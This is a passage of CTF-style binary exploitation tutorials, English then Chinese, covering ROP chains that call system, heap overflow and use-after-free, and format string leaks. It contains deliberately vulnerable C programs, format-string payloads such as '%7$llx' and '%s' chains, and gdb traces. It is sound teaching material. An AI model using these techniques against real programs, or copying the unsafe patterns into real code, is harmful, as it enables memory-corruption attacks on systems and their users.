As we saw in buffer overflows, having stack control can be very powerful since it allows us to overwrite saved instruction pointers, giving us control over what the program does next. Most programs don't have a convenient give_shell
function, however, so we need to find a way to manually invoke the system
or another exec
function to get us our shell.
32 bit
Imagine we have a program similar to the following:
#include <stdio.h>
#include <stdlib.h>
char name[32];
int main() {
printf("What's your name? ");
read(0, name, 32);
printf("Hi %s\n", name);
printf("The time is currently ");
system("/bin/date");
char echo[100];
printf("What do you want me to echo back? ");
read(0, echo, 1000);
puts(echo);
return 0;
}
We obviously have a stack buffer overflow on the echo
variable which can give us EIP control when the main
returns. But we don't have a give_shell
function! So what can we do?
We can call the system
with an argument we control! Since arguments are passed in on the stack in 32-bit Linux programs (see calling conventions), if we have stack control, we have argument control.
When the main returns, we want our stack to look like something normally called system
. Recall what is on the stack after a function has been called:
... // More arguments
0xffff0008: 0x00000002 // Argument 2
0xffff0004: 0x00000001 // Argument 1
ESP -> 0xffff0000: 0x080484d0 // Return address
So the main
's stack frame needs to look like this:
0xffff0008: 0xdeadbeef // system argument 1
0xffff0004: 0xdeadbeef // return address for system
ESP -> 0xffff0000: 0x08048450 // return address for main (system's PLT entry)
Then when the main
returns, it will jump into the system
's PLT entry and the stack will appear just like the system
had been called normally for the first time.
Note: we don't care about the return address system
will return to because we will have already gotten our shell by then!
Arguments
This is a good start, but we need to pass an argument to the system
for anything to happen. As mentioned in the page on ASLR, the stack and dynamic libraries "move around" each time a program is run, which means we can't easily use data on the stack or a string in libc for our argument. In this case, however, we have a very convenient name
global which will be at a known location in the binary (in the BSS segment).
Putting it together
Our exploit will need to do the following:
- Enter "sh" or another command to run as the
name
- Fill the stack with
- Garbage up to the saved EIP
- The address of the
system
's PLT entry - A fake return address for the system to jump to when it's done
- The address of the
name
global acts as the first argument to thesystem
64 bit
In 64-bit binaries, we have to work a bit harder to pass arguments to functions. The basic idea of overwriting the saved RIP is the same, but as discussed in calling conventions, arguments are passed in registers in 64-bit programs. In the case of running the system
, this means we will need to find a way to control the RDI register.
To do this, we'll use small snippets of assembly in the binary, called "gadgets." These gadgets usually pop
one or more registers off of the stack, and then call ret
, which allows us to chain them together by making a large fake call stack.
For example, if we needed control of both RDI and RSI, we might find two gadgets in our program that look like this (using a tool like rp++ or ROPgadget):
0x400c01: pop rdi; ret
0x400c03: pop rsi; pop r15; ret
We can set up a fake call stack with these gadgets to sequentially execute them, pop
ing values we control into registers, and then end with a jump to the system
.
Example
0xffff0028: 0x400d00 // where we want the rsi gadget's ret to jump to now that rdi and rsi are controlled
0xffff0020: 0x1337beef // value we want in r15 (probably garbage)
0xffff0018: 0x1337beef // value we want in rsi
0xffff0010: 0x400c03 // address that the rdi gadget's ret will return to - the pop rsi gadget
0xffff0008: 0xdeadbeef // value to be popped into rdi
RSP -> 0xffff0000: 0x400c01 // address of rdi gadget
Stepping through this one instruction at a time, main
returns, jumping to our pop rdi
gadget:
RIP = 0x400c01 (pop rdi)
RDI = UNKNOWN
RSI = UNKNOWN
0xffff0028: 0x400d00 // where we want the rsi gadget's ret to jump to now that rdi and rsi are controlled
0xffff0020: 0x1337beef // value we want in r15 (probably garbage)
0xffff0018: 0x1337beef // value we want in rsi
0xffff0010: 0x400c03 // address that the rdi gadget's ret will return to - the pop rsi gadget
RSP -> 0xffff0008: 0xdeadbeef // value to be popped into rdi
pop rdi
is then executed, popping the top of the stack into RDI:
RIP = 0x400c02 (ret)
RDI = 0xdeadbeef
RSI = UNKNOWN
0xffff0028: 0x400d00 // where we want the rsi gadget's ret to jump to now that rdi and rsi are controlled
0xffff0020: 0x1337beef // value we want in r15 (probably garbage)
0xffff0018: 0x1337beef // value we want in rsi
RSP -> 0xffff0010: 0x400c03 // address that the rdi gadget's ret will return to - the pop rsi gadget
The RDI gadget then ret
s into our RSI gadget:
RIP = 0x400c03 (pop rsi)
RDI = 0xdeadbeef
RSI = UNKNOWN
0xffff0028: 0x400d00 // where we want the rsi gadget's ret to jump to now that rdi and rsi are controlled
0xffff0020: 0x1337beef // value we want in r15 (probably garbage)
RSP -> 0xffff0018: 0x1337beef // value we want in rsi
RSI and R15 are popped:
RIP = 0x400c05 (ret)
RDI = 0xdeadbeef
RSI = 0x1337beef
RSP -> 0xffff0028: 0x400d00 // where we want the rsi gadget's ret to jump to now that rdi and rsi are controlled
And finally, the RSI gadget ret
s, jumping to whatever function we want, but now with RDI and RSI set to values we control.
Binary Security
Binary Security is using tools and methods in order to secure programs from being manipulated and exploited. These tools are not infallible, but when used together and implemented properly, they can raise the difficulty of exploitation greatly.
Some methods covered include:
- No eXecute (NX)
- Address Space Layout Randomization (ASLR)
- Relocation Read-Only (RELRO)
- Stack Canaries/Cookies
The Heap
A heap is a place in memory that a program can use to dynamically create objects. Creating objects on the heap has some advantages compared to using the stack:
- Heap allocations can be dynamically sized
- Heap allocations "persist" when a function returns
There are also some disadvantages, however:
- Heap allocations can be slower
- Heap allocations must be manually cleaned up
Using the heap
In C, there are a number of functions used to interact with the heap, but we're going to focus on the two core ones:
malloc
: allocaten
bytes on the heapfree
: free the given allocation
Let's see how these could be used in a program:
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main() {
unsigned alloc_size = 0;
char *stuff;
printf("Number of bytes? ");
scanf("%u", &alloc_size);
stuff = malloc(alloc_size + 1);
memset(0, stuff, alloc_size + 1);
read(0, stuff, alloc_size);
printf("You wrote: %s", stuff);
free(stuff);
return 0;
}
This program reads in a size from the user, creates an allocation of that size on the heap, reads in that many bytes, then prints it back out to the user.
Heap Exploits
Overflow
Much like a stack buffer overflow, a heap overflow is a vulnerability where more data than can fit in the allocated buffer is read in. This could lead to heap metadata corruption, or corruption of other heap objects, which could in turn provide a new attack surface.
Use After Free (UAF)
Once free
is called on an allocation, the allocator is free to reallocate that chunk of memory in future calls to malloc
if it so chooses. However, if the program author isn't careful and uses the freed object later on, the contents may be corrupt (or even attacker controlled). This is called use after free or UAF.
Example
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
typedef struct string {
unsigned length;
char *data;
} string;
int main() {
struct string* s = malloc(sizeof(string));
puts("Length:");
scanf("%u", &s->length);
s->data = malloc(s->length + 1);
memset(s->data, 0, s->length + 1);
puts("Data:");
read(0, s->data, s->length);
free(s->data);
free(s);
char *s2 = malloc(16);
memset(s2, 0, 16);
puts("More data:");
read(0, s2, 15);
// Now using s again, a UAF
puts(s->data);
return 0;
}
In this example, we have a string
structure with a length and a pointer to the actual string data. We properly allocate, fill, and then free an instance of this structure. Then we make another allocation, fill it, and then improperly reference the freed string
. Due to how Glibc's allocator works, s2
will actually get the same memory as the original s
allocation, which in turn gives us the ability to control the s->data
pointer. This could be used to leak program data.
Advanced Heap Exploitation
Not only can the heap be exploited by the data in allocations, but exploits can also use the underlying mechanisms in malloc
, free
, etc. to exploit a program. This is beyond the scope of CTF 101, but here are a few recommended resources:
Format String Vulnerability
A format string vulnerability is a bug where user input is passed as the format argument to printf
, scanf
, or another function in that family.
The format argument has many different specifies which could allow an attacker to leak data if they control the format argument to printf
. Since printf
and similar are variadic functions, they will continue popping data off of the stack according to the format.
For example, if we can make the format argument "%x.%x.%x.%x", printf
will pop off four stack values and print them in hexadecimal, potentially leaking sensitive information.
printf
can also index to an arbitrary "argument" with the following syntax: "%n$x" (where n
is the decimal index of the argument you want).
While these bugs are powerful, they're very rare nowadays, as all modern compilers warn when printf
is called with a non-constant string.
Example
#include <stdio.h>
#include <unistd.h>
int main() {
int secret_num = 0x8badf00d;
char name[64] = {0};
read(0, name, 64);
printf("Hello ");
printf(name);
printf("! You'll never get my secret!\n");
return 0;
}
Due to how GCC decided to lay out the stack, secret_num
is actually at a lower address on the stack than name
, so we only have to go to the 7th "argument" in printf
to leak the secret:
$ ./fmt_string
%7$llx
Hello 8badf00d3ea43eef
! You'll never get my secret!
Binary Exploitation
3.1.1 格式化字符串漏洞
格式化输出函数和格式字符串
在 C 语言基础章节中,我们详细介绍了格式化输出函数和格式化字符串的内容。在开始探索格式化字符串漏洞之前,强烈建议回顾该章节。这里我们简单回顾几个常用的。
函数
#include <stdio.h>
int printf(const char *format, ...);
int fprintf(FILE *stream, const char *format, ...);
int dprintf(int fd, const char *format, ...);
int sprintf(char *str, const char *format, ...);
int snprintf(char *str, size_t size, const char *format, ...);
转换指示符
字符 | 类型 | 使用 |
---|---|---|
d | 4-byte | Integer |
u | 4-byte | Unsigned Integer |
x | 4-byte | Hex |
s | 4-byte ptr | String |
c | 1-byte | Character |
长度
字符 | 类型 | 使用 |
---|---|---|
hh | 1-byte | char |
h | 2-byte | short int |
l | 4-byte | long int |
ll | 8-byte | long long int |
示例
#include<stdio.h>
#include<stdlib.h>
void main() {
char *format = "%s";
char *arg1 = "Hello World!\n";
printf(format, arg1);
}
printf("%03d.%03d.%03d.%03d", 127, 0, 0, 1); // "127.000.000.001"
printf("%.2f", 1.2345); // 1.23
printf("%#010x", 3735928559); // 0xdeadbeef
printf("%s%n", "01234", &n); // n = 5
格式化字符串漏洞基本原理
在 x86 结构下,格式字符串的参数是通过栈传递的,看一个例子:
#include<stdio.h>
void main() {
printf("%s %d %s", "Hello World!", 233, "\n");
}
gdb-peda$ disassemble main
Dump of assembler code for function main:
0x0000053d <+0>: lea ecx,[esp+0x4]
0x00000541 <+4>: and esp,0xfffffff0
0x00000544 <+7>: push DWORD PTR [ecx-0x4]
0x00000547 <+10>: push ebp
0x00000548 <+11>: mov ebp,esp
0x0000054a <+13>: push ebx
0x0000054b <+14>: push ecx
0x0000054c <+15>: call 0x585 <__x86.get_pc_thunk.ax>
0x00000551 <+20>: add eax,0x1aaf
0x00000556 <+25>: lea edx,[eax-0x19f0]
0x0000055c <+31>: push edx
0x0000055d <+32>: push 0xe9
0x00000562 <+37>: lea edx,[eax-0x19ee]
0x00000568 <+43>: push edx
0x00000569 <+44>: lea edx,[eax-0x19e1]
0x0000056f <+50>: push edx
0x00000570 <+51>: mov ebx,eax
0x00000572 <+53>: call 0x3d0 <printf@plt>
0x00000577 <+58>: add esp,0x10
0x0000057a <+61>: nop
0x0000057b <+62>: lea esp,[ebp-0x8]
0x0000057e <+65>: pop ecx
0x0000057f <+66>: pop ebx
0x00000580 <+67>: pop ebp
0x00000581 <+68>: lea esp,[ecx-0x4]
0x00000584 <+71>: ret
End of assembler dump.
gdb-peda$ n
[----------------------------------registers-----------------------------------]
EAX: 0x56557000 --> 0x1efc
EBX: 0x56557000 --> 0x1efc
ECX: 0xffffd250 --> 0x1
EDX: 0x5655561f ("%s %d %s")
ESI: 0xf7f95000 --> 0x1bbd90
EDI: 0x0
EBP: 0xffffd238 --> 0x0
ESP: 0xffffd220 --> 0x5655561f ("%s %d %s")
EIP: 0x56555572 (<main+53>: call 0x565553d0 <printf@plt>)
EFLAGS: 0x216 (carry PARITY ADJUST zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x56555569 <main+44>: lea edx,[eax-0x19e1]
0x5655556f <main+50>: push edx
0x56555570 <main+51>: mov ebx,eax
=> 0x56555572 <main+53>: call 0x565553d0 <printf@plt>
0x56555577 <main+58>: add esp,0x10
0x5655557a <main+61>: nop
0x5655557b <main+62>: lea esp,[ebp-0x8]
0x5655557e <main+65>: pop ecx
Guessed arguments:
arg[0]: 0x5655561f ("%s %d %s")
arg[1]: 0x56555612 ("Hello World!")
arg[2]: 0xe9
arg[3]: 0x56555610 --> 0x6548000a ('\n')
[------------------------------------stack-------------------------------------]
0000| 0xffffd220 --> 0x5655561f ("%s %d %s")
0004| 0xffffd224 --> 0x56555612 ("Hello World!")
0008| 0xffffd228 --> 0xe9
0012| 0xffffd22c --> 0x56555610 --> 0x6548000a ('\n')
0016| 0xffffd230 --> 0xffffd250 --> 0x1
0020| 0xffffd234 --> 0x0
0024| 0xffffd238 --> 0x0
0028| 0xffffd23c --> 0xf7df1253 (<__libc_start_main+243>: add esp,0x10)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x56555572 in main ()
gdb-peda$ r
Continuing
Hello World! 233
[Inferior 1 (process 27416) exited with code 022]
根据 cdecl 的调用约定,在进入 printf()
函数之前,将参数从右到左依次压栈。进入 printf()
之后,函数首先获取第一个参数,一次读取一个字符。如果字符不是 %
,字符直接复制到输出中。否则,读取下一个非空字符,获取相应的参数并解析输出。(注意:% d
和 %d
是一样的)
接下来我们修改一下上面的程序,给格式字符串加上 %x %x %x %3$s
,使它出现格式化字符串漏洞:
#include<stdio.h>
void main() {
printf("%s %d %s %x %x %x %3$s", "Hello World!", 233, "\n");
}
反汇编后的代码同上,没有任何区别。我们主要看一下参数传递:
gdb-peda$ n
[----------------------------------registers-----------------------------------]
EAX: 0x56557000 --> 0x1efc
EBX: 0x56557000 --> 0x1efc
ECX: 0xffffd250 --> 0x1
EDX: 0x5655561f ("%s %d %s %x %x %x %3$s")
ESI: 0xf7f95000 --> 0x1bbd90
EDI: 0x0
EBP: 0xffffd238 --> 0x0
ESP: 0xffffd220 --> 0x5655561f ("%s %d %s %x %x %x %3$s")
EIP: 0x56555572 (<main+53>: call 0x565553d0 <printf@plt>)
EFLAGS: 0x216 (carry PARITY ADJUST zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x56555569 <main+44>: lea edx,[eax-0x19e1]
0x5655556f <main+50>: push edx
0x56555570 <main+51>: mov ebx,eax
=> 0x56555572 <main+53>: call 0x565553d0 <printf@plt>
0x56555577 <main+58>: add esp,0x10
0x5655557a <main+61>: nop
0x5655557b <main+62>: lea esp,[ebp-0x8]
0x5655557e <main+65>: pop ecx
Guessed arguments:
arg[0]: 0x5655561f ("%s %d %s %x %x %x %3$s")
arg[1]: 0x56555612 ("Hello World!")
arg[2]: 0xe9
arg[3]: 0x56555610 --> 0x6548000a ('\n')
[------------------------------------stack-------------------------------------]
0000| 0xffffd220 --> 0x5655561f ("%s %d %s %x %x %x %3$s")
0004| 0xffffd224 --> 0x56555612 ("Hello World!")
0008| 0xffffd228 --> 0xe9
0012| 0xffffd22c --> 0x56555610 --> 0x6548000a ('\n')
0016| 0xffffd230 --> 0xffffd250 --> 0x1
0020| 0xffffd234 --> 0x0
0024| 0xffffd238 --> 0x0
0028| 0xffffd23c --> 0xf7df1253 (<__libc_start_main+243>: add esp,0x10)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x56555572 in main ()
gdb-peda$ c
Continuing.
Hello World! 233
ffffd250 0 0
[Inferior 1 (process 27480) exited with code 041]
这一次栈的结构和上一次相同,只是格式字符串有变化。程序打印出了七个值(包括换行),而我们其实只给出了前三个值的内容,后面的三个 %x
打印出了 0xffffd230~0xffffd238
栈内的数据,这些都不是我们输入的。而最后一个参数 %3$s
是对 0xffffd22c
中 \n
的重用。
上一个例子中,格式字符串中要求的参数个数大于我们提供的参数个数。在下面的例子中,我们省去了格式字符串,同样存在漏洞:
#include<stdio.h>
void main() {
char buf[50];
if (fgets(buf, sizeof buf, stdin) == NULL)
return;
printf(buf);
}
gdb-peda$ n
[----------------------------------registers-----------------------------------]
EAX: 0xffffd1fa ("Hello %x %x %x !\n")
EBX: 0x56557000 --> 0x1ef8
ECX: 0xffffd1fa ("Hello %x %x %x !\n")
EDX: 0xf7f9685c --> 0x0
ESI: 0xf7f95000 --> 0x1bbd90
EDI: 0x0
EBP: 0xffffd238 --> 0x0
ESP: 0xffffd1e0 --> 0xffffd1fa ("Hello %x %x %x !\n")
EIP: 0x5655562a (<main+77>: call 0x56555450 <printf@plt>)
EFLAGS: 0x296 (carry PARITY ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x56555623 <main+70>: sub esp,0xc
0x56555626 <main+73>: lea eax,[ebp-0x3e]
0x56555629 <main+76>: push eax
=> 0x5655562a <main+77>: call 0x56555450 <printf@plt>
0x5655562f <main+82>: add esp,0x10
0x56555632 <main+85>: jmp 0x56555635 <main+88>
0x56555634 <main+87>: nop
0x56555635 <main+88>: mov eax,DWORD PTR [ebp-0xc]
Guessed arguments:
arg[0]: 0xffffd1fa ("Hello %x %x %x !\n")
[------------------------------------stack-------------------------------------]
0000| 0xffffd1e0 --> 0xffffd1fa ("Hello %x %x %x !\n")
0004| 0xffffd1e4 --> 0x32 ('2')
0008| 0xffffd1e8 --> 0xf7f95580 --> 0xfbad2288
0012| 0xffffd1ec --> 0x565555f4 (<main+23>: add ebx,0x1a0c)
0016| 0xffffd1f0 --> 0xffffffff
0020| 0xffffd1f4 --> 0xffffd47a ("/home/firmy/Desktop/RE4B/c.out")
0024| 0xffffd1f8 --> 0x65485ea0
0028| 0xffffd1fc ("llo %x %x %x !\n")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x5655562a in main ()
gdb-peda$ c
Continuing.
Hello 32 f7f95580 565555f4 !
[Inferior 1 (process 28253) exited normally]
如果大家都是好孩子,输入正常的字符,程序就不会有问题。由于没有格式字符串,如果我们在 buf
中输入一些转换指示符,则 printf()
会把它当做格式字符串并解析,漏洞发生。例如上面演示的我们输入了 Hello %x %x %x !\n
(其中 \n
是 fgets()
函数给我们自动加上的),这时,程序就会输出栈内的数据。
我们可以总结出,其实格式字符串漏洞发生的条件就是格式字符串要求的参数和实际提供的参数不匹配。下面我们讨论两个问题:
-
为什么可以通过编译?
- 因为
printf()
函数的参数被定义为可变的。 - 为了发现不匹配的情况,编译器需要理解
printf()
是怎么工作的和格式字符串是什么。然而,编译器并不知道这些。 - 有时格式字符串并不是固定的,它可能在程序执行中动态生成。
- 因为
-
printf()
函数自己可以发现不匹配吗?
printf()
函数从栈中取出参数,如果它需要 3 个,那它就取出 3 个。除非栈的边界被标记了,否则printf()
是不会知道它取出的参数比提供给它的参数多了。然而并没有这样的标记。
格式化字符串漏洞利用
通过提供格式字符串,我们就能够控制格式化函数的行为。漏洞的利用主要有下面几种。
使程序崩溃
格式化字符串漏洞通常要在程序崩溃时才会被发现,所以利用格式化字符串漏洞最简单的方式就是使进程崩溃。在 Linux 中,存取无效的指针会引起进程收到 SIGSEGV
信号,从而使程序非正常终止并产生核心转储(在 Linux 基础的章节中详细介绍了核心转储)。我们知道核心转储中存储了程序崩溃时的许多重要信息,这些信息正是攻击者所需要的。
利用类似下面的格式字符串即可触发漏洞:
printf("%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s")
- 对于每一个
%s
,printf()
都要从栈中获取一个数字,把该数字视为一个地址,然后打印出地址指向的内存内容,直到出现一个 NULL 字符。 - 因为不可能获取的每一个数字都是地址,数字所对应的内存可能并不存在。
- 还有可能获得的数字确实是一个地址,但是该地址是被保护的。
查看栈内容
使程序崩溃只是验证漏洞的第一步,攻击者还可以利用格式化输出函数来获得内存的内容,为下一步漏洞利用做准备。我们已经知道了,格式化字符串函数会根据格式字符串从栈上取值。由于在 x86 上栈由高地址向低地址增长,而 printf()
函数的参数是以逆序被压入栈的,所以参数在内存中出现的顺序与在 printf()
调用时出现的顺序是一致的。
下面的演示我们都使用下面的源码:
#include<stdio.h>
void main() {
char format[128];
int arg1 = 1, arg2 = 0x88888888, arg3 = -1;
char arg4[10] = "ABCD";
scanf("%s", format);
printf(format, arg1, arg2, arg3, arg4);
printf("\n");
}
# echo 0 > /proc/sys/kernel/randomize_va_space
$ gcc -m32 -fno-stack-protector -no-pie fmt.c
我们先输入 b main
设置断点,使用 n
往下执行,在 call 0x56555460 <__isoc99_scanf@plt>
处输入 %08x.%08x.%08x.%08x.%08x
,然后使用 c
继续执行,即可输出结果。
gdb-peda$ n
[----------------------------------registers-----------------------------------]
EAX: 0xffffd584 ("%08x.%08x.%08x.%08x.%08x")
EBX: 0x56557000 --> 0x1efc
ECX: 0x1
EDX: 0xf7f9883c --> 0x0
ESI: 0xf7f96e68 --> 0x1bad90
EDI: 0x0
EBP: 0xffffd618 --> 0x0
ESP: 0xffffd550 --> 0xffffd584 ("%08x.%08x.%08x.%08x.%08x")
EIP: 0x56555642 (<main+133>: call 0x56555430 <printf@plt>)
EFLAGS: 0x292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x56555638 <main+123>: push DWORD PTR [ebp-0xc]
0x5655563b <main+126>: lea eax,[ebp-0x94]
0x56555641 <main+132>: push eax
=> 0x56555642 <main+133>: call 0x56555430 <printf@plt>
0x56555647 <main+138>: add esp,0x20
0x5655564a <main+141>: sub esp,0xc
0x5655564d <main+144>: push 0xa
0x5655564f <main+146>: call 0x56555450 <putchar@plt>
Guessed arguments:
arg[0]: 0xffffd584 ("%08x.%08x.%08x.%08x.%08x")
arg[1]: 0x1
arg[2]: 0x88888888
arg[3]: 0xffffffff
arg[4]: 0xffffd57a ("ABCD")
[------------------------------------stack-------------------------------------]
0000| 0xffffd550 --> 0xffffd584 ("%08x.%08x.%08x.%08x.%08x")
0004| 0xffffd554 --> 0x1
0008| 0xffffd558 --> 0x88888888
0012| 0xffffd55c --> 0xffffffff
0016| 0xffffd560 --> 0xffffd57a ("ABCD")
0020| 0xffffd564 --> 0xffffd584 ("%08x.%08x.%08x.%08x.%08x")
0024| 0xffffd568 (" RUV\327UUVT\332\377\367\001")
0028| 0xffffd56c --> 0x565555d7 (<main+26>: add ebx,0x1a29)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x56555642 in main ()
gdb-peda$ x/10x $esp
0xffffd550: 0xffffd584 0x00000001 0x88888888 0xffffffff
0xffffd560: 0xffffd57a 0xffffd584 0x56555220 0x565555d7
0xffffd570: 0xf7ffda54 0x00000001
gdb-peda$ c
Continuing.
00000001.88888888.ffffffff.ffffd57a.ffffd584
格式化字符串 0xffffd584
的地址出现在内存中的位置恰好位于参数 arg1
、arg2
、arg3
、arg4
之前。格式字符串 %08x.%08x.%08x.%08x.%08x
表示函数 printf()
从栈中取出 5 个参数并将它们以 8 位十六进制数的形式显示出来。格式化输出函数使用一个内部变量来标志下一个参数的位置。开始时,参数指针指向第一个参数(arg1
)。随着每一个参数被相应的格式规范所耗用,参数指针的值也根据参数的长度不断递增。在显示完当前执行函数的剩余自动变量之后,printf()
将显示当前执行函数的栈帧(包括返回地址和参数等)。
当然也可以使用 %p.%p.%p.%p.%p
得到相似的结果。
gdb-peda$ n
[----------------------------------registers-----------------------------------]
EAX: 0xffffd584 ("%p.%p.%p.%p.%p")
EBX: 0x56557000 --> 0x1efc
ECX: 0x1
EDX: 0xf7f9883c --> 0x0
ESI: 0xf7f96e68 --> 0x1bad90
EDI: 0x0
EBP: 0xffffd618 --> 0x0
ESP: 0xffffd550 --> 0xffffd584 ("%p.%p.%p.%p.%p")
EIP: 0x56555642 (<main+133>: call 0x56555430 <printf@plt>)
EFLAGS: 0x292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x56555638 <main+123>: push DWORD PTR [ebp-0xc]
0x5655563b <main+126>: lea eax,[ebp-0x94]
0x56555641 <main+132>: push eax
=> 0x56555642 <main+133>: call 0x56555430 <printf@plt>
0x56555647 <main+138>: add esp,0x20
0x5655564a <main+141>: sub esp,0xc
0x5655564d <main+144>: push 0xa
0x5655564f <main+146>: call 0x56555450 <putchar@plt>
Guessed arguments:
arg[0]: 0xffffd584 ("%p.%p.%p.%p.%p")
arg[1]: 0x1
arg[2]: 0x88888888
arg[3]: 0xffffffff
arg[4]: 0xffffd57a ("ABCD")
[------------------------------------stack-------------------------------------]
0000| 0xffffd550 --> 0xffffd584 ("%p.%p.%p.%p.%p")
0004| 0xffffd554 --> 0x1
0008| 0xffffd558 --> 0x88888888
0012| 0xffffd55c --> 0xffffffff
0016| 0xffffd560 --> 0xffffd57a ("ABCD")
0020| 0xffffd564 --> 0xffffd584 ("%p.%p.%p.%p.%p")
0024| 0xffffd568 (" RUV\327UUVT\332\377\367\001")
0028| 0xffffd56c --> 0x565555d7 (<main+26>: add ebx,0x1a29)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x56555642 in main ()
gdb-peda$ c
Continuing.
0x1.0x88888888.0xffffffff.0xffffd57a.0xffffd584
上面的方法都是依次获得栈中的参数,如果我们想要直接获得被指定的某个参数,则可以使用类似下面的格式字符串:
%<arg#>$<format>
%n$x
这里的 n
表示栈中格式字符串后面的第 n
个值。
gdb-peda$ n
[----------------------------------registers-----------------------------------]
EAX: 0xffffd584 ("%3$x.%1$08x.%2$p.%2$p.%4$p.%5$p.%6$p")
EBX: 0x56557000 --> 0x1efc
ECX: 0x1
EDX: 0xf7f9883c --> 0x0
ESI: 0xf7f96e68 --> 0x1bad90
EDI: 0x0
EBP: 0xffffd618 --> 0x0
ESP: 0xffffd550 --> 0xffffd584 ("%3$x.%1$08x.%2$p.%2$p.%4$p.%5$p.%6$p")
EIP: 0x56555642 (<main+133>: call 0x56555430 <printf@plt>)
EFLAGS: 0x292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x56555638 <main+123>: push DWORD PTR [ebp-0xc]
0x5655563b <main+126>: lea eax,[ebp-0x94]
0x56555641 <main+132>: push eax
=> 0x56555642 <main+133>: call 0x56555430 <printf@plt>
0x56555647 <main+138>: add esp,0x20
0x5655564a <main+141>: sub esp,0xc
0x5655564d <main+144>: push 0xa
0x5655564f <main+146>: call 0x56555450 <putchar@plt>
Guessed arguments:
arg[0]: 0xffffd584 ("%3$x.%1$08x.%2$p.%2$p.%4$p.%5$p.%6$p")
arg[1]: 0x1
arg[2]: 0x88888888
arg[3]: 0xffffffff
arg[4]: 0xffffd57a ("ABCD")
[------------------------------------stack-------------------------------------]
0000| 0xffffd550 --> 0xffffd584 ("%3$x.%1$08x.%2$p.%2$p.%4$p.%5$p.%6$p")
0004| 0xffffd554 --> 0x1
0008| 0xffffd558 --> 0x88888888
0012| 0xffffd55c --> 0xffffffff
0016| 0xffffd560 --> 0xffffd57a ("ABCD")
0020| 0xffffd564 --> 0xffffd584 ("%3$x.%1$08x.%2$p.%2$p.%4$p.%5$p.%6$p")
0024| 0xffffd568 (" RUV\327UUVT\332\377\367\001")
0028| 0xffffd56c --> 0x565555d7 (<main+26>: add ebx,0x1a29)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x56555642 in main ()
gdb-peda$ x/10w $esp
0xffffd550: 0xffffd584 0x00000001 0x88888888 0xffffffff
0xffffd560: 0xffffd57a 0xffffd584 0x56555220 0x565555d7
0xffffd570: 0xf7ffda54 0x00000001
gdb-peda$ c
Continuing.
ffffffff.00000001.0x88888888.0x88888888.0xffffd57a.0xffffd584.0x56555220
这里,格式字符串的地址为 0xffffd584
。我们通过格式字符串 %3$x.%1$08x.%2$p.%2$p.%4$p.%5$p.%6$p
分别获取了 arg3
、arg1
、两个 arg2
、arg4
和栈上紧跟参数的两个值。可以看到这种方法非常强大,可以获得栈中任意的值。
查看任意地址的内存
攻击者可以使用一个“显示指定地址的内存”的格式规范来查看任意地址的内存。例如,使用 %s
显示参数 指针所指定的地址的内存,将它作为一个 ASCII 字符串处理,直到遇到一个空字符。如果攻击者能够操纵这个参数指针指向一个特定的地址,那么 %s
就会输出该位置的内存内容。
还是上面的程序,我们输入 %4$s
,输出的 arg4
就变成了 ABCD
而不是地址 0xffffd57a
:
gdb-peda$ n
[----------------------------------registers-----------------------------------]
EAX: 0xffffd584 ("%4$s")
EBX: 0x56557000 --> 0x1efc
ECX: 0x1
EDX: 0xf7f9883c --> 0x0
ESI: 0xf7f96e68 --> 0x1bad90
EDI: 0x0
EBP: 0xffffd618 --> 0x0
ESP: 0xffffd550 --> 0xffffd584 ("%4$s")
EIP: 0x56555642 (<main+133>: call 0x56555430 <printf@plt>)
EFLAGS: 0x292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x56555638 <main+123>: push DWORD PTR [ebp-0xc]
0x5655563b <main+126>: lea eax,[ebp-0x94]
0x56555641 <main+132>: push eax
=> 0x56555642 <main+133>: call 0x56555430 <printf@plt>
0x56555647 <main+138>: add esp,0x20
0x5655564a <main+141>: sub esp,0xc
0x5655564d <main+144>: push 0xa
0x5655564f <main+146>: call 0x56555450 <putchar@plt>
Guessed arguments:
arg[0]: 0xffffd584 ("%4$s")
arg[1]: 0x1
arg[2]: 0x88888888
arg[3]: 0xffffffff
arg[4]: 0xffffd57a ("ABCD")
[------------------------------------stack-------------------------------------]
0000| 0xffffd550 --> 0xffffd584 ("%4$s")
0004| 0xffffd554 --> 0x1
0008| 0xffffd558 --> 0x88888888
0012| 0xffffd55c --> 0xffffffff
0016| 0xffffd560 --> 0xffffd57a ("ABCD")
0020| 0xffffd564 --> 0xffffd584 ("%4$s")
0024| 0xffffd568 (" RUV\327UUVT\332\377\367\001")
0028| 0xffffd56c --> 0x565555d7 (<main+26>: add ebx,0x1a29)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x56555642 in main ()
gdb-peda$ c
Continuing.
ABCD
上面的例子只能读取栈中已有的内容,如果我们想获取的是任意的地址的内容,就需要我们自己将地址写入到栈中。我们输入 AAAA.%p
这样的格式的字符串,观察一下栈有什么变化。
gdb-peda$ python print("AAAA"+".%p"*20)
AAAA.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p
...
gdb-peda$ n
[----------------------------------registers-----------------------------------]
EAX: 0xffffd584 ("AAAA.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p")
EBX: 0x56557000 --> 0x1efc
ECX: 0x1
EDX: 0xf7f9883c --> 0x0
ESI: 0xf7f96e68 --> 0x1bad90
EDI: 0x0
EBP: 0xffffd618 --> 0x0
